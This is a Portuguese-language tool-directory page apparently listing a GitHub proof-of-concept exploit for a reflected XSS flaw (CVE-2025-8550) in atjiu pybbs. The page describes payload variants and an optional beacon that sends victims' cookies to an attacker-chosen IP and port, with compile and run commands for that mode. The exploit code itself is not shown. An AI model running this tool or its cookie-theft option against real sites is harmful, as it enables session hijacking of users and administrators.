Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-8550 — Exploit de XSS para CVE-2025-8550 no atjiu pybbs ≤6.0.0 | Kitploit
Ferramentas/GitHubGitHub/bytereaper77/cve-2025-8550
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingArchived
GitHubbytereaper77/cve-2025-8550

CVE-2025-8550

Exploit de XSS para CVE-2025-8550 no atjiu pybbs ≤6.0.0

Ver Repositório
31há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-8550 – Exploit XSS atjiu pybbs

Descrição

Este repositório contém um exploit automatizado de Prova de Conceito (PoC) para a CVE-2025-8550, uma vulnerabilidade de Cross‑Site Scripting (XSS) refletido no atjiu pybbs (≤ v6.0.0). Ele tem como alvo o parâmetro username do endpoint /admin/topic/list, que não possui sanitização adequada de entrada.

Recursos

  • Mais de 20 variações de payload: script, SVG, iframe, object, manipuladores onerror e mais.

  • Codificação automática de URL: garante injeção segura através do curl_easy_escape do libcurl.

  • Exfiltração de Cookies (Opcional): injeção de beacon para enviar document.cookie para um servidor controlado pelo atacante.

  • Multithreading: utiliza pthreads para paralelizar tentativas e acelerar os testes.

  • CLI personalizável: alimentado por argparse, suporta especificar:

    • URL do alvo (-u / --url)
    • Arquivo de cookies para requisições autenticadas (-c / --cookies)
    • Ativar payload de cookie (-k / --cokpay)
    • IP/porta do servidor atacante (-i / --ip, -p / --port)
    • Log detalhado (-v / --verbose)

Compilação e Uso

root@kitploit:~
# Compile the exploit binary
gcc exploit.c argparse.c -o CVE-2025-8550 -lcurl -lpthread 

# Run against target
./CVE-2025-8550 -u http://<TARGET> -v [-c [COOKIE_FILE]]

#COOKIE SEND :
./CVE-2025-8550 -u http://TARGET -i <YOUR_IP> -p <YOUR_PORT> -v [VERBOSE_MODE] -k [PAYLOAD_COOKIE]
  • Substitua http://<TARGET> pela sua instância do atjiu pybbs.
  • Use -k para ativar o beacon de roubo de cookies (requer -i e -p).
  • Omita -c se não forem necessários cookies de autenticação.

Referências:

  • Entrada NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-8550

Licença:

Licença MIT

Baixar ferramenta